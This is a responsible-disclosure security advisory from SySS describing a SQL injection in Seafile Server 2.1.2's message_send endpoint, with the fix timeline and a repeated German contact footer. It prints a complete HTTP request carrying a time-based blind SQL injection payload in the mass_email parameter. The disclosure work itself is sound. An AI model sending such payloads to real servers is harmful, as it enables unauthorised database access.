Advisory ID: | SYSS-2014-001 |
Product: | Seafile Server Community Edition |
Vendor: | Seafile Ltd. |
Affected Version(s): | until 2.1.2 Linux |
Tested Version (s): | 2.1.2 Linux, 2.1.3 Linux |
Vulnerability Type: | SQL Injection |
Risk Level: | High |
Solution Status: | None |
Vendor Notification: | January, 2014 |
Solution Date: | Open |
Public Disclosure: | Open |
CVE Reference: | Not assigned |
Author Advisory: | Marcel Mangold, SySS GmbH, https://www.syss.de/advisories/ Document date: 2013-01-07, |
The software suffers from at least one sql injection vulnerability
The script which handels requests to message/message_send/?from=user has an POST parameter called mass_email that is vulnerable to sql injection. (Fixed in version 2.1.3).
Request:
+------------------------------------
POST /message/message_send/?from=user HTTP/1.1
Host: 127.0.0.1:8000 User-Agent: Mozilla/5.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: de Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-CSRFToken: dAjlY2zLmP1SmdoneDzTBRG6XynhhAVk
X-Requested-With: XMLHttpRequest
Referer: 127.0.0.1/user/2/msgs/
Content-Length: 120
Cookie: csrftoken=dAjlY2zLmP1SmdoneDzTBRG6XynhhAVk; sessionid=zrqax2zwfbjo51h8ttilp7r7yujrwxeq
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache mass_msg=asdf&mass_email=victim%40sample.xy'+AND+1%3dLIKE('SYSS',UPPER(HEX(RANDOMBLOB(500000000/2))))+AND+'syss'%3d'syss
Response is delayed - if the value of mass_email is changed to victim%40sample.xy the answer is delivered almost instantly. The vulnerability could be verified using sqlmap [3].
Update to version 2.1.3.
2014-01-07 - Vulnerability discovered
2014-01-07 - Vulnerability reported to developer
2014-01-08 - Fix commited to github by developer
2014-01-11 - Information about fix sent to me by email
2014-01-13 - Verified fix
[1] SySS GmbH, SYSS-2013-002 - www.syss.de/advisories/SYSS-2014-001 - SQL-Injection in Seafile 2.1.2 Server
[2] SySS GmbH, SySS Responsible Disclosure Policy - www.syss.de/responsible_disclosure_policy
[3] sqlmap.org
Security vulnerability found by Responsible Hacker of the SySS GmbH. E-Mail: marcel.mangold@syss.de Public Key: www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Marcel_Mangold.asc Key ID: AC15E5BE Key Fingerprint: E21C 69ED 9A64 7486 6EDD 5E29 4EFE B20B AC15 E5BE
The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site [1].
Creative Commons - Attribution (by) - Version 3.0 URL: creativecommons.org/licenses/by/3.0/deed.en
Ihr direkter Kontakt zu SySS +49 (0)7071 - 40 78 56-0 oder anfrage@syss.de | IN DRINGENDEN FÄLLEN AUSSERHALB DER GESCHÄFTSZEITEN +49 (0)7071 - 40 78 56-99
Als Rahmenvertragskunde wählen Sie bitte die bereitgestellte Rufbereitschaftsnummer
Ihr direkter Kontakt zu SySS +49 (0)7071 - 40 78 56-0 oder anfrage@syss.de
IN DRINGENDEN FÄLLEN AUSSERHALB DER GESCHÄFTSZEITEN +49 (0)7071 - 40 78 56-99
Als Rahmenvertragskunde wählen Sie bitte die bereitgestellte Rufbereitschaftsnummer
Direkter Kontakt
+49 (0)7071 - 40 78 56-0 oder anfrage@syss.de
IN DRINGENDEN FÄLLEN AUSSERHALB DER GESCHÄFTSZEITEN
+49 (0)7071 - 40 78 56-99
Als Rahmenvertragskunde wählen Sie bitte die bereitgestellte Rufbereitschaftsnummer